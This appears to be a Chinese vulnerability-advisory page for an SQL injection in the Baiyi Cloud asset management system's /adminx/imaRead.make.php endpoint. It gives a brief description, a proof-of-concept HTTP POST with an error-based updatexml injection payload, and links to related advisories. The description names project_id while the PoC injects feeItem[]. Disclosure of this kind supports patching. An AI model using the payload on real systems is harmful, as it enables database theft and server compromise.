百易云资产管理运营系统 /adminx/imaRead.make.php SQL 注入漏洞

漏洞描述

百易云资产管理运营系统是一款专为资产管理和运营设计的软件，提供高效的资产管理解决方案。系统在接口imaRead.make.php和leaseImaRead.make.php中，未对用户输入的project_id参数进行过滤，导致SQL注入漏洞。攻击者可以利用此漏洞获取数据库中的敏感信息（如管理员密码、用户数据），甚至通过高权限写入木马，进一步控制服务器。

PoC代码

POST /adminx/imaRead.make.php?act=remake HTTP/1.1
feeItem[]=1+AND+updatexml(1,concat(0x7e,md5(12345678)),1)

相关漏洞推荐

百易云资产管理运营系统 rolePower.save.php SQL注入漏洞无POC

2025-07-17 | 百易云资产管理运营系统

百易云资产管理运营系统 rolePower.save.php接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之...
百易云资产管理运营系统 /adminx/user.delete.php SQL 注入漏洞无POC

2025-07-14 | 百易云资产管理运营系统

百易云资产管理运营系统是一款用于资产管理和运营的综合性软件。系统的 /adminx/user.delete.php 接口存在SQL注入漏洞，攻击者可以通过发送特制的POST请求，利用注入参数执行恶意S...
百易云资产管理运营系统 user.save.php SQL注入漏洞无POC

2025-07-10 | 百易云资产管理运营系统

百易云资产管理运营系统存在SQL注入漏洞，攻击者可以构造恶意的sql语句获取数据库信息或权限。
baiyi-mobilefront2-fileupload: 百易云资产管理运营系统mobilefront2前台文件上传漏洞 POC

2025-09-01 | baiyi-mobilefront2-fileupload

湖南众合百易信息技术有限公司（简称：百易云）成立于2017年是一家专注于不动产领域数字化研发及服务的国家高新技术企业，公司拥有不动产领域的数字化全面解决方案、覆盖住宅、写字楼、商业中心、专业市场、产业...
LemonLDAP::NG 操作系统命令注入漏洞无POC

2025-09-20 00:03:21 | LemonLDAP::NG

LemonLDAP::NG是LemonLDAP::NG开源的一套Web单点登录和访问管理软件。 LemonLDAP::NG 2.16.7之前版本和2.17版本至2.21.3之前版本存在操作系统命令注入...

漏洞描述

PoC代码

相关漏洞推荐

百易云资产管理运营系统 rolePower.save.php SQL注入漏洞 无POC

百易云资产管理运营系统 /adminx/user.delete.php SQL 注入漏洞 无POC

百易云资产管理运营系统 user.save.php SQL注入漏洞 无POC

baiyi-mobilefront2-fileupload: 百易云资产管理运营系统mobilefront2前台文件上传漏洞 POC

LemonLDAP::NG 操作系统命令注入漏洞 无POC

百易云资产管理运营系统 rolePower.save.php SQL注入漏洞无POC

百易云资产管理运营系统 /adminx/user.delete.php SQL 注入漏洞无POC

百易云资产管理运营系统 user.save.php SQL注入漏洞无POC

LemonLDAP::NG 操作系统命令注入漏洞无POC